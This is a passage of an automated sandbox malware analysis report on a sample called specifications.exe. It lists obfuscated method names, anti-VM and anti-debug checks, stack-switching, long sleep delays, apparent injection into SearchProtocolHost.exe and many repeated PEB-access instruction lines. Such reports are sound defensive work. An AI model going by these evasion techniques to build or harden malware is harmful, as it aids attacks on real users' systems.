                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, bR5ZsB5OxIKaAOfDsF.csHigh entropy of concatenated method names: 'yvUvNWPveD', 'J8LvWbHwic', 'XkKvv5eVgr', 'f7TvBMHSRx', 'HA3vLcBl2r', 'sDtv68ycU4', 'Dispose', 'WaQCJmZFNk', 'PGvCtb6bi1', 'BqQCqhwqYR'
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, hQ8YnHs2KPWV1iQcyl.csHigh entropy of concatenated method names: 'REuqyHSnVl', 'Ffpq7sRrOY', 'b92q8h4K9k', 'WOoqst0lbN', 'yOpqNEOjti', 'glCqIISJ9v', 'MAyqWs8n9S', 'bgTqCTNXpM', 'esdqv7RMwT', 'f6mqTcNOOX'
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, eaG1tjZ70qKcAZMcNI.csHigh entropy of concatenated method names: 'iE0ORld4Bf', 'TymOtEFA2t', 'jW2OSrByF8', 'lEMODPFHak', 'zusO0CfUrP', 'Lj2S4YZ3GU', 'aXtSlaOwUA', 'nI1S5itYxL', 'HBoSAHcScV', 'QuHShm5Feo'
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, zWhdhdV0x5yn5otc4J.csHigh entropy of concatenated method names: 'KrlDiboUxE', 'DHLD1hB0Fa', 'xX7DHWLQcI', 'p1NDyJ107Z', 'wUNDfoBZbR', 'jQtD77dhYU', 'ShgDgNMl54', 'LWZD8a7yXO', 'N0DDsWh4s0', 'cqEDobkLBU'
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, CSgTqOzp7p85XO53B2.csHigh entropy of concatenated method names: 'tqnT7AHUir', 'JwiT8vEJU3', 'KeXTsE1h6p', 'eIHTZpi2FK', 'NLyTjJPGrY', 'yYiTrJ7Gfa', 'BZxTdTetuZ', 'TrUT68W8GE', 'mw9TigLSMw', 'Gm3T1sTuL1'
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: specifications.exe PID: 7352, type: MEMORYSTR
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                      Source: C:\Users\user\Desktop\specifications.exeMemory allocated: 2FA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeMemory allocated: 31B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeMemory allocated: 3100000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeMemory allocated: 5780000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeMemory allocated: 6780000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeMemory allocated: 68B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeMemory allocated: 78B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeMemory allocated: BA50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeMemory allocated: CA50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeMemory allocated: CEE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeMemory allocated: DEE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C096E rdtsc 2_2_010C096E
                      Source: C:\Users\user\Desktop\specifications.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeWindow / User API: threadDelayed 9803Jump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeAPI coverage: 0.7 %
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI coverage: 2.6 %
                      Source: C:\Users\user\Desktop\specifications.exe TID: 7372Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 7976Thread sleep count: 169 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 7976Thread sleep time: -338000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 7976Thread sleep count: 9803 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 7976Thread sleep time: -19606000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe TID: 8000Thread sleep time: -75000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe TID: 8000Thread sleep count: 32 > 30Jump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe TID: 8000Thread sleep time: -48000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe TID: 8000Thread sleep count: 36 > 30Jump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe TID: 8000Thread sleep time: -36000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_0012C860 FindFirstFileW,FindNextFileW,FindClose,7_2_0012C860
                      Source: C:\Users\user\Desktop\specifications.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: neghZqrDWkxUmu.exe, 00000008.00000002.4144945463.0000000000B60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
                      Source: SearchProtocolHost.exe, 00000007.00000002.4144766432.0000000000419000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: firefox.exe, 00000009.00000002.2331577982.0000020EF56BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllee
                      Source: C:\Users\user\Desktop\specifications.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C096E rdtsc 2_2_010C096E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_00417C23 LdrLoadDll,2_2_00417C23
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01140115 mov eax, dword ptr fs:[00000030h]2_2_01140115
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112A118 mov ecx, dword ptr fs:[00000030h]2_2_0112A118
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112A118 mov eax, dword ptr fs:[00000030h]2_2_0112A118
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112A118 mov eax, dword ptr fs:[00000030h]2_2_0112A118
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112A118 mov eax, dword ptr fs:[00000030h]2_2_0112A118
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112E10E mov eax, dword ptr fs:[00000030h]2_2_0112E10E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112E10E mov ecx, dword ptr fs:[00000030h]2_2_0112E10E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112E10E mov eax, dword ptr fs:[00000030h]2_2_0112E10E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112E10E mov eax, dword ptr fs:[00000030h]2_2_0112E10E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112E10E mov ecx, dword ptr fs:[00000030h]2_2_0112E10E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112E10E mov eax, dword ptr fs:[00000030h]2_2_0112E10E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112E10E mov eax, dword ptr fs:[00000030h]2_2_0112E10E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112E10E mov ecx, dword ptr fs:[00000030h]2_2_0112E10E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112E10E mov eax, dword ptr fs:[00000030h]2_2_0112E10E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112E10E mov ecx, dword ptr fs:[00000030h]2_2_0112E10E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B0124 mov eax, dword ptr fs:[00000030h]2_2_010B0124
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01118158 mov eax, dword ptr fs:[00000030h]2_2_01118158
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107C156 mov eax, dword ptr fs:[00000030h]2_2_0107C156
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01114144 mov eax, dword ptr fs:[00000030h]2_2_01114144
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01114144 mov eax, dword ptr fs:[00000030h]2_2_01114144
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01114144 mov ecx, dword ptr fs:[00000030h]2_2_01114144
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01114144 mov eax, dword ptr fs:[00000030h]2_2_01114144
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01114144 mov eax, dword ptr fs:[00000030h]2_2_01114144
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01086154 mov eax, dword ptr fs:[00000030h]2_2_01086154
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01086154 mov eax, dword ptr fs:[00000030h]2_2_01086154
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01154164 mov eax, dword ptr fs:[00000030h]2_2_01154164
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01154164 mov eax, dword ptr fs:[00000030h]2_2_01154164
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C0185 mov eax, dword ptr fs:[00000030h]2_2_010C0185
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110019F mov eax, dword ptr fs:[00000030h]2_2_0110019F
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110019F mov eax, dword ptr fs:[00000030h]2_2_0110019F
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110019F mov eax, dword ptr fs:[00000030h]2_2_0110019F
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110019F mov eax, dword ptr fs:[00000030h]2_2_0110019F
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107A197 mov eax, dword ptr fs:[00000030h]2_2_0107A197
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107A197 mov eax, dword ptr fs:[00000030h]2_2_0107A197
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107A197 mov eax, dword ptr fs:[00000030h]2_2_0107A197
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01124180 mov eax, dword ptr fs:[00000030h]2_2_01124180
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01124180 mov eax, dword ptr fs:[00000030h]2_2_01124180
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0113C188 mov eax, dword ptr fs:[00000030h]2_2_0113C188
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0113C188 mov eax, dword ptr fs:[00000030h]2_2_0113C188
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011461C3 mov eax, dword ptr fs:[00000030h]2_2_011461C3
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011461C3 mov eax, dword ptr fs:[00000030h]2_2_011461C3
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FE1D0 mov eax, dword ptr fs:[00000030h]2_2_010FE1D0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FE1D0 mov eax, dword ptr fs:[00000030h]2_2_010FE1D0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FE1D0 mov ecx, dword ptr fs:[00000030h]2_2_010FE1D0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FE1D0 mov eax, dword ptr fs:[00000030h]2_2_010FE1D0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FE1D0 mov eax, dword ptr fs:[00000030h]2_2_010FE1D0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011561E5 mov eax, dword ptr fs:[00000030h]2_2_011561E5
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B01F8 mov eax, dword ptr fs:[00000030h]2_2_010B01F8
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01104000 mov ecx, dword ptr fs:[00000030h]2_2_01104000
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01122000 mov eax, dword ptr fs:[00000030h]2_2_01122000
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01122000 mov eax, dword ptr fs:[00000030h]2_2_01122000
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01122000 mov eax, dword ptr fs:[00000030h]2_2_01122000
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01122000 mov eax, dword ptr fs:[00000030h]2_2_01122000
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01122000 mov eax, dword ptr fs:[00000030h]2_2_01122000
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01122000 mov eax, dword ptr fs:[00000030h]2_2_01122000
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01122000 mov eax, dword ptr fs:[00000030h]2_2_01122000
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01122000 mov eax, dword ptr fs:[00000030h]2_2_01122000
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109E016 mov eax, dword ptr fs:[00000030h]2_2_0109E016
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109E016 mov eax, dword ptr fs:[00000030h]2_2_0109E016
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109E016 mov eax, dword ptr fs:[00000030h]2_2_0109E016
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109E016 mov eax, dword ptr fs:[00000030h]2_2_0109E016
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01116030 mov eax, dword ptr fs:[00000030h]2_2_01116030
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107A020 mov eax, dword ptr fs:[00000030h]2_2_0107A020
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107C020 mov eax, dword ptr fs:[00000030h]2_2_0107C020
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01106050 mov eax, dword ptr fs:[00000030h]2_2_01106050
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01082050 mov eax, dword ptr fs:[00000030h]2_2_01082050
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AC073 mov eax, dword ptr fs:[00000030h]2_2_010AC073
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108208A mov eax, dword ptr fs:[00000030h]2_2_0108208A
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010780A0 mov eax, dword ptr fs:[00000030h]2_2_010780A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011460B8 mov eax, dword ptr fs:[00000030h]2_2_011460B8
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011460B8 mov ecx, dword ptr fs:[00000030h]2_2_011460B8
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011180A8 mov eax, dword ptr fs:[00000030h]2_2_011180A8
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011020DE mov eax, dword ptr fs:[00000030h]2_2_011020DE
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010880E9 mov eax, dword ptr fs:[00000030h]2_2_010880E9
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0107A0E3
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011060E0 mov eax, dword ptr fs:[00000030h]2_2_011060E0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107C0F0 mov eax, dword ptr fs:[00000030h]2_2_0107C0F0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C20F0 mov ecx, dword ptr fs:[00000030h]2_2_010C20F0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BA30B mov eax, dword ptr fs:[00000030h]2_2_010BA30B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BA30B mov eax, dword ptr fs:[00000030h]2_2_010BA30B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BA30B mov eax, dword ptr fs:[00000030h]2_2_010BA30B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107C310 mov ecx, dword ptr fs:[00000030h]2_2_0107C310
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A0310 mov ecx, dword ptr fs:[00000030h]2_2_010A0310
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01158324 mov eax, dword ptr fs:[00000030h]2_2_01158324
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01158324 mov ecx, dword ptr fs:[00000030h]2_2_01158324
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01158324 mov eax, dword ptr fs:[00000030h]2_2_01158324
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01158324 mov eax, dword ptr fs:[00000030h]2_2_01158324
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01128350 mov ecx, dword ptr fs:[00000030h]2_2_01128350
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114A352 mov eax, dword ptr fs:[00000030h]2_2_0114A352
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110035C mov eax, dword ptr fs:[00000030h]2_2_0110035C
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110035C mov eax, dword ptr fs:[00000030h]2_2_0110035C
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110035C mov eax, dword ptr fs:[00000030h]2_2_0110035C
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110035C mov ecx, dword ptr fs:[00000030h]2_2_0110035C
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110035C mov eax, dword ptr fs:[00000030h]2_2_0110035C
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110035C mov eax, dword ptr fs:[00000030h]2_2_0110035C
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01102349 mov eax, dword ptr fs:[00000030h]2_2_01102349
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01102349 mov eax, dword ptr fs:[00000030h]2_2_01102349
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01102349 mov eax, dword ptr fs:[00000030h]2_2_01102349
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01102349 mov eax, dword ptr fs:[00000030h]2_2_01102349
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01102349 mov eax, dword ptr fs:[00000030h]2_2_01102349
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01102349 mov eax, dword ptr fs:[00000030h]2_2_01102349
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01102349 mov eax, dword ptr fs:[00000030h]2_2_01102349
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01102349 mov eax, dword ptr fs:[00000030h]2_2_01102349
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01102349 mov eax, dword ptr fs:[00000030h]2_2_01102349
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01102349 mov eax, dword ptr fs:[00000030h]2_2_01102349
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01102349 mov eax, dword ptr fs:[00000030h]2_2_01102349
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01102349 mov eax, dword ptr fs:[00000030h]2_2_01102349
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01102349 mov eax, dword ptr fs:[00000030h]2_2_01102349
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01102349 mov eax, dword ptr fs:[00000030h]2_2_01102349
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01102349 mov eax, dword ptr fs:[00000030h]2_2_01102349
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0115634F mov eax, dword ptr fs:[00000030h]2_2_0115634F
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112437C mov eax, dword ptr fs:[00000030h]2_2_0112437C
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A438F mov eax, dword ptr fs:[00000030h]2_2_010A438F
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A438F mov eax, dword ptr fs:[00000030h]2_2_010A438F
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107E388 mov eax, dword ptr fs:[00000030h]2_2_0107E388
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107E388 mov eax, dword ptr fs:[00000030h]2_2_0107E388
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107E388 mov eax, dword ptr fs:[00000030h]2_2_0107E388
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01078397 mov eax, dword ptr fs:[00000030h]2_2_01078397
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01078397 mov eax, dword ptr fs:[00000030h]2_2_01078397
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01078397 mov eax, dword ptr fs:[00000030h]2_2_01078397
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011243D4 mov eax, dword ptr fs:[00000030h]2_2_011243D4
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011243D4 mov eax, dword ptr fs:[00000030h]2_2_011243D4
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108A3C0 mov eax, dword ptr fs:[00000030h]2_2_0108A3C0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108A3C0 mov eax, dword ptr fs:[00000030h]2_2_0108A3C0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108A3C0 mov eax, dword ptr fs:[00000030h]2_2_0108A3C0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108A3C0 mov eax, dword ptr fs:[00000030h]2_2_0108A3C0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108A3C0 mov eax, dword ptr fs:[00000030h]2_2_0108A3C0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108A3C0 mov eax, dword ptr fs:[00000030h]2_2_0108A3C0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010883C0 mov eax, dword ptr fs:[00000030h]2_2_010883C0
